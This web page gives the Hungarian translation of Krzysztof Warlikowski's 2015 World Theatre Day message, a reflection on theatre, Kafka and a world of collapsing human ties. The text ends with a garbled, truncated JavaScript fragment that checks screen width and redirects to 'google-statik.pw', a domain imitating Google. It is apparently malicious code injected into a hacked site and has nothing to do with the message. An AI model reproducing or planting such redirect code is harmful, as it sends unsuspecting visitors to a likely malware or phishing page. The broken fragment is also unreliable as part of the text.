Színházi Világnapi Üzenet 2015

Forras: Nemzetkozi Szinhazi Intezet Magyar Kozpontja

 

A szinhaz igaz mestereit a szinpadtol tavol a legkonnyebb megtalalni. Oket nem erdekli az olyan szinhaz, ami gepiesen masolja a konvenciokat es termeli ujra a kliseket. Ok inkabb az impulzusok forrasat keresik, az elo aramlatokat, amelyek gyakran elkerulik a szinhaztermeket es azokat, akik valamifele vilagok utanzasaval bajlodnak. Utanzunk, ahelyett, hogy sajat elmelyult vilagot teremtenenk, ami a kozonseggel folytatott parbeszedre es a felszin alatt aramlo erzelmekre epul, sot, mindez letezesenek feltetele. Hiszen a szinhaznal semmi sem kepes jobban megmutatni a szenvedelyeket.

 

Gyakran a proza mutat iranyt nekem. Nap nap utan olyan irokon tunodom, akik mintegy szaz evvel ezelott leirtak, megjosoltak az europai istenek hanyatlasat, az enyeszetet, ami civilizacionkat idotlen sotetsegbe taszitotta. Franz Kafkara gondolok, Thomas Mannra es Marcel Proustra. De kozejuk sorolom kortarsunkat, John Maxwell Coetzeet is.

 

Kozos bennuk a vilagvege elkerulhetetlen erzese – es itt nem bolygonk megszunesere gondolok, hanem az emberek kozotti kapcsolatok es tarsadalmi rendszer felbomlasara, ami fajdalmas kiserojelensege eletunknek. Mindnyajunk eletenek, akik a vilagveget kovetoen letezunk. Buntenyek es konfliktusok kereszttuzeben, amik gyorsabban robbannak ki, minthogy a mindenutt jelenlevo media tudositasaibol ertesulhetnenk roluk. Ezek a tuzveszek amugy gyorsan unalmassa valnak, es orokre eltunnek a sajtohirekbol, mi pedig tehetetlennek, remultnek, sarokba szoritottnak erezzuk magunkat. Nem vagyunk mar kepesek tornyokat epiteni, a falak pedig - amelyeket megrogzott makacssaggal huzunk fel -, mar nem vedenek meg semmitol, eppen ellenkezoleg, maguk is vedelemre es gondoskodasra szorulnak. Es mindez eletenergiank nagy reszet felemeszti. Mar nincs eronk, hogy eszrevegyuk, mi van a kapuk, a falak mogott. Es eppen ezert kell a szinhaznak leteznie, eppen ebbol kellene meritenie az erejet. Hogy belessen oda, ahova nem szabadna.

 

„A monda a megmagyarazhatatlant probalja magyarazni. Mivel a valosagra epul, ujra megmagyarazhatatlansagban kell vegzodnie.”* - e szavakat, amelyeket Kafka a Prometheuszrol szolo mondak kapcsan fogalmazott meg, en erosen arra vonatkoztatom, milyennek kellene lennie a szinhaznak. Valosagra epulo es ujra a megmagyarazhatatlansagban vegzodo szinhazat kivanok minden munkatarsnak – a szinpadon levoknek, es a nezoteren uloknek egyarant – teljes szivembol.

 

 

Krzysztof Warlikowski

Forditotta: dr. Paszt Patricia


* Tandori Dezso forditasa
if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width